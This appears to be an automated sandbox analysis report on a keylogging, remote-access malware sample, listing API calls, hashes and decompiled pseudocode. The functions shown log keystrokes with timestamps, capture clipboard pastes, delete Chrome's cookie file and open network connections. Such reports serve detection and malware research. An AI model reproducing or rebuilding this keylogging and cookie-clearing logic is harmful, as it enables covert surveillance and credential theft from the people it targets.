                                              • Part of subcall function 013C2881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 013C28DF
                                              • Part of subcall function 013C2881: ??3@YAXPAX@Z.MSVCRT ref: 013C28E6
                                              • Part of subcall function 013C2881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013C28F3
                                              • Part of subcall function 013C2881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,013C5774), ref: 013C28FC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$V01@@$?c_str@?$basic_string@?length@?$basic_string@$D@1@@MessageV12@$?substr@?$basic_string@G@1@@Heap$??2@??3@??4?$basic_string@?find@?$basic_string@CreateDispatchEventFreeTranslateV01@
                                            • String ID: CloseChat$DisplayMessage$GetMessage
                                            • API String ID: 1701728818-749203953
                                            • Opcode ID: 2013a5be2d6750a96d2c7462c776f68f9eea7f4208a92f4a184461eaa1fa4a9c
                                            • Instruction ID: 8e935ba72bfcf5197c56b8e58b72935ca902d303b5e5c16acb6f1d1f30b6b36b
                                            • Opcode Fuzzy Hash: 2013a5be2d6750a96d2c7462c776f68f9eea7f4208a92f4a184461eaa1fa4a9c
                                            • Instruction Fuzzy Hash: 69516F72A00209AFCB24ABA4E8899EE7F7CEF64755F440519F602D3544EF74BA458B90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B6952, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 135COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(013C5B9C,?,00000000,?,770C73F0,?), ref: 013B697B
                                            • toupper.MSVCRT ref: 013B698A
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [Ctrl + ,?,00000000), ref: 013B699E
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 013B69A9
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B69C5
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B69CE
                                            • toupper.MSVCRT ref: 013B6A61
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013B69B3
                                              • Part of subcall function 013B54E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,013B7AAE,?,00000000,?,013B78A9), ref: 013B54FC
                                              • Part of subcall function 013B54E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,013B7AAE,?,00000000,?,013B78A9), ref: 013B550F
                                              • Part of subcall function 013B54E9: SetEvent.KERNEL32(00000000,?,013B7AAE,?,00000000,?,013B78A9), ref: 013B5518
                                              • Part of subcall function 013B54E9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,013B7AAE,?,00000000,?,013B78A9), ref: 013B5527
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,770C73F0,?), ref: 013B69D7
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?, [Ctrl + V][Following text has been pasted from clipboard:],00000000,?,[End of clipboard text],00000000,?,770C73F0,?), ref: 013B6A01
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text],00000000,?,770C73F0,?), ref: 013B6A0B
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,770C73F0,?), ref: 013B6A1D
                                            • tolower.MSVCRT ref: 013B6A3A
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?), ref: 013B6ABF
                                            Strings
                                            • [End of clipboard text], xrefs: 013B69EC
                                            • [Ctrl + V][Following text has been pasted from clipboard:], xrefs: 013B69FB
                                            • [Ctrl + , xrefs: 013B6996
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@$V01@V01@@V10@Y?$basic_string@toupper$EventV10@0@V10@@tolower
                                            • String ID: [End of clipboard text]$ [Ctrl + $ [Ctrl + V][Following text has been pasted from clipboard:]
                                            • API String ID: 1567161615-398269065
                                            • Opcode ID: d99b30b33ea880070caac9bcd8b0b27c82b134c0984d0645966cc9bd9523a679
                                            • Instruction ID: bc8d55228528774fcb019b812fca3b04ee79b48f30ffd3b3488dae08a437819d
                                            • Opcode Fuzzy Hash: d99b30b33ea880070caac9bcd8b0b27c82b134c0984d0645966cc9bd9523a679
                                            • Instruction Fuzzy Hash: 1841F9B1A04308BFDF15E7ADE88AAEEBF7CAB54704F04045DE54393542EB71BA088751
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B5DD3, Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 75timeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 33%
                                            			E013B5DD3(void* __ecx, char _a4) {
				struct _SYSTEMTIME _v20;
				char _v36;
				char _v52;
				char* _t24;
				char* _t25;
				char* _t33;
				int _t34;
				void* _t46;
				void* _t47;

				_t47 = __ecx;
				GetLocalTime( &_v20);
				_t24 =  &_v52;
				L013C4176();
				_t25 =  &_v36;
				L013C4170();
				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t25, _t25, _t24, _t24, "\r\n[%04i/%02i/%02i %02i:%02i:%02i ",  &_a4, "]\r\n");
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				_t46 = malloc(_t25 + 0x64);
				_t33 = _v20.wYear & 0x0000ffff;
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t33, _v20.wMonth & 0x0000ffff, _v20.wDay & 0x0000ffff, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff);
				_t34 = sprintf(_t46, _t33);
				if( *((char*)(_t47 + 0x3c)) != 0) {
					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t46);
				}
				if( *((char*)(_t47 + 0x3d)) != 0) {
					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t46);
					_t20 = _t47 + 0x34; // 0x0
					_t34 = SetEvent( *_t20);
				}
				free(_t46);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t34;
			}












                                            0x013b5dde
                                            0x013b5de1
                                            0x013b5df0
                                            0x013b5df9
                                            0x013b5e02
                                            0x013b5e06
                                            0x013b5e12
                                            0x013b5e1b
                                            0x013b5e24
                                            0x013b5e2d
                                            0x013b5e3d
                                            0x013b5e5c
                                            0x013b5e61
                                            0x013b5e69
                                            0x013b5e76
                                            0x013b5e7c
                                            0x013b5e7c
                                            0x013b5e86
                                            0x013b5e8c
                                            0x013b5e92
                                            0x013b5e95
                                            0x013b5e95
                                            0x013b5e9c
                                            0x013b5ea6
                                            0x013b5eaf

                                            APIs
                                            • GetLocalTime.KERNEL32(?,747843E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,013B51C6), ref: 013B5DE1
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,013B51C6), ref: 013B5DF9
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 013B5E06
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 013B5E12
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 013B5E1B
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 013B5E24
                                            • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 013B5E2D
                                            • malloc.MSVCRT ref: 013B5E37
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,013B51C6,?,?,?,?,]), ref: 013B5E61
                                            • sprintf.MSVCRT ref: 013B5E69
                                            • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 013B5E7C
                                            • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 013B5E8C
                                            • SetEvent.KERNEL32(00000000), ref: 013B5E95
                                            • free.MSVCRT(00000000), ref: 013B5E9C
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B5EA6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@V01@$D@2@@0@Hstd@@V?$basic_string@Y?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@EventLocalTimeV01@@V10@V10@@freemallocsprintf
                                            • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                            • API String ID: 2201004561-248792730
                                            • Opcode ID: 914e08b4ab5b931d24198faf714b2c5ecbdf3da84e364518381c8e9b6309b629
                                            • Instruction ID: e9a7902b7cd832c5f3e13ea62243e73644f7cabf0c5ba0792b4cc4ecb5a47616
                                            • Opcode Fuzzy Hash: 914e08b4ab5b931d24198faf714b2c5ecbdf3da84e364518381c8e9b6309b629
                                            • Instruction Fuzzy Hash: 3E212F76900219AFCB20ABA5ED58EFE7BBCBF58B06F044419F942D1094EB74B644CB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013BD9A0, Relevance: 27.1, APIs: 18, Instructions: 96COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetKeyboardLayoutNameA.USER32 ref: 013BD9AF
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 013BD9BA
                                              • Part of subcall function 013C2E83: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 013C2E9D
                                              • Part of subcall function 013C2718: _itoa.MSVCRT ref: 013C2736
                                              • Part of subcall function 013C2718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,013BCC05,?,00000000,013CB310,00000000,013CB310,?), ref: 013C274A
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012,?,00000000,00000000,?,?,00000000,00000000), ref: 013BD9FC
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 013BDA11
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 013BDA21
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BDA31
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BDA3E
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BDA4B
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BDA55
                                              • Part of subcall function 013B20C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,013CBE70,?,013BCF62,0000004B), ref: 013B20D1
                                              • Part of subcall function 013B20C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B20E7
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000012), ref: 013BDA6C
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BDA75
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BDA81
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BDA8D
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BDA99
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BDAA5
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 013BE69B
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 013BE6AC
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BE6B5
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@CreateD@1@@FileG@2@@std@@G@std@@KeyboardLayoutNameV01@@V10@V10@@_itoa
                                            • String ID:
                                            • API String ID: 3751107300-0
                                            • Opcode ID: 7f4b4689cc6b8f6d609c1c371295b1d7d6a43f61f2e7e4ea972d2397b0e4f0a3
                                            • Instruction ID: 7e501f803532218c58131846a7fecdc9d388d04bda86832f3af8f4da6f7700de
                                            • Opcode Fuzzy Hash: 7f4b4689cc6b8f6d609c1c371295b1d7d6a43f61f2e7e4ea972d2397b0e4f0a3
                                            • Instruction Fuzzy Hash: 3D31327290011A9FCB15ABA4EC59FEFBB7CBB64706F000469E506E3055EF70AA49CF61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B71CF, Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 65fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 32%
                                            			E013B71CF() {
				char _v5;
				char _v6;
				char _v24;
				void* _v40;
				char* _t12;
				CHAR* _t13;
				long _t20;
				char* _t21;
				void* _t25;

				_t12 = getenv("UserProfile");
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t12,  &_v5, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
				_t13 =  &_v24;
				L013C4170();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t13, _t12);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				if(DeleteFileA(_t13) != 0) {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v6);
					E013B7A90("\n[Chrome Cookies found, cleared!]");
					_t25 = 1;
					L8:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return _t25;
				}
				_t20 = GetLastError();
				if(_t20 == 0) {
					_t21 =  &_v6;
					L5:
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t21);
					E013B7A90("\n[Chrome Cookies not found]");
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return 1;
				}
				if(_t20 == 1) {
					_t21 =  &_v5;
					goto L5;
				}
				_t25 = 0;
				goto L8;
			}












                                            0x013b71e4
                                            0x013b71ef
                                            0x013b71f6
                                            0x013b71fa
                                            0x013b7205
                                            0x013b720e
                                            0x013b721d
                                            0x013b7271
                                            0x013b7277
                                            0x013b727f
                                            0x013b7281
                                            0x013b7284
                                            0x00000000
                                            0x013b728a
                                            0x013b7226
                                            0x013b7227
                                            0x013b725c
                                            0x013b7238
                                            0x013b723e
                                            0x013b7244
                                            0x013b724f
                                            0x00000000
                                            0x013b7255
                                            0x013b722a
                                            0x013b7233
                                            0x00000000
                                            0x013b7236
                                            0x013b722c
                                            0x00000000

                                            APIs
                                            • getenv.MSVCRT ref: 013B71E4
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 013B71EF
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 013B71FA
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B7205
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 013B720E
                                            • DeleteFileA.KERNEL32(00000000), ref: 013B7215
                                            • GetLastError.KERNEL32 ref: 013B721F
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies not found],00000000), ref: 013B723E
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B724F
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies found, cleared!],00000000), ref: 013B7271
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B7284
                                            Strings
                                            • [Chrome Cookies found, cleared!], xrefs: 013B726C
                                            • [Chrome Cookies not found], xrefs: 013B7239
                                            • UserProfile, xrefs: 013B71DF
                                            • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 013B71D9
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                            • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                            • API String ID: 3740952235-304995407
                                            • Opcode ID: c0c3c7ba029e623e1a1d1c346fb12b5c922d3cc67e08e4291b559535bb0a4701
                                            • Instruction ID: e313c238d36128aa0b454e2ae584d190e14f8062c289fbc7daba6435a21ec7f9
                                            • Opcode Fuzzy Hash: c0c3c7ba029e623e1a1d1c346fb12b5c922d3cc67e08e4291b559535bb0a4701
                                            • Instruction Fuzzy Hash: 73115175A041099FDB10BBB4D99E9FE7B3CEB64709F400059E902E2684FB71BA44CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B5812, Relevance: 25.6, APIs: 17, Instructions: 138COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 013B2010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,013BE823,00000001,?,00000000), ref: 013B201E
                                              • Part of subcall function 013B209B: connect.WS2_32(013CBE70,013CBE74,00000010), ref: 013B20B1
                                            • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 013B5853
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 013B5868
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 013B5874
                                              • Part of subcall function 013C2DDF: CreateFileW.KERNEL32(747DF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,747DF560,?,013B9C9F,00000000), ref: 013C2DF9
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 013B5898
                                            • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 013B58AE
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 013B58B7
                                            • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 013B58CC
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 013B58D6
                                              • Part of subcall function 013B309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,013B8CAD,00000000), ref: 013B30B4
                                              • Part of subcall function 013B309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 013B30C0
                                              • Part of subcall function 013B309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 013B30D5
                                              • Part of subcall function 013B309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B30DE
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,Function_0001B310), ref: 013B5902
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 013B5922
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013B590C
                                              • Part of subcall function 013B20C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,013CBE70,?,013BCF62,0000004B), ref: 013B20D1
                                              • Part of subcall function 013B20C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B20E7
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,Function_0001B310), ref: 013B5943
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013B594D
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 013B5963
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B5974
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B597F
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,Function_0001B310), ref: 013B5994
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@D@1@@$?data@?$basic_string@?length@?$basic_string@G@2@@std@@G@std@@V01@@$?empty@?$basic_string@CreateFileconnect
                                            • String ID:
                                            • API String ID: 257471410-0
                                            • Opcode ID: 2c2f86453d5865d6c764a38d84128e3f06ab36d0b11cd4a4c51cf71b909ec999
                                            • Instruction ID: 9f730c82da415a4d57169934d2645e51264fc8ad64789d4f5d4819df1233fba8
                                            • Opcode Fuzzy Hash: 2c2f86453d5865d6c764a38d84128e3f06ab36d0b11cd4a4c51cf71b909ec999
                                            • Instruction Fuzzy Hash: 03419572E001099FCB15FBA8ED959EEB73DAF24609F100119EA12A7145EB717F08CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C203B, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 61timeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 32%
                                            			E013C203B(char _a4, char _a20) {
				struct _SYSTEMTIME _v20;
				char _v36;
				char _v52;
				char _v68;
				char _v84;
				int _t18;
				char* _t26;
				char* _t27;
				char* _t28;
				char* _t29;

				if( *0x13cbcac != 0) {
					GetLocalTime( &_v20);
					_t26 =  &_v84;
					L013C4176();
					_t27 =  &_v68;
					L013C4170();
					_t28 =  &_v52;
					L013C4140();
					_t29 =  &_v36;
					L013C4170();
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t29, _t28, _t28, _t27, _t27, _t26, _t26, "%02i:%02i:%02i:%03i ",  &_a4, " ",  &_a20, 0x13c5770, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff);
					_t18 = printf(_t29);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				}
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t18;
			}













                                            0x013c2048
                                            0x013c2052
                                            0x013c207e
                                            0x013c2087
                                            0x013c2090
                                            0x013c2094
                                            0x013c209d
                                            0x013c20a1
                                            0x013c20aa
                                            0x013c20ae
                                            0x013c20b8
                                            0x013c20bf
                                            0x013c20cb
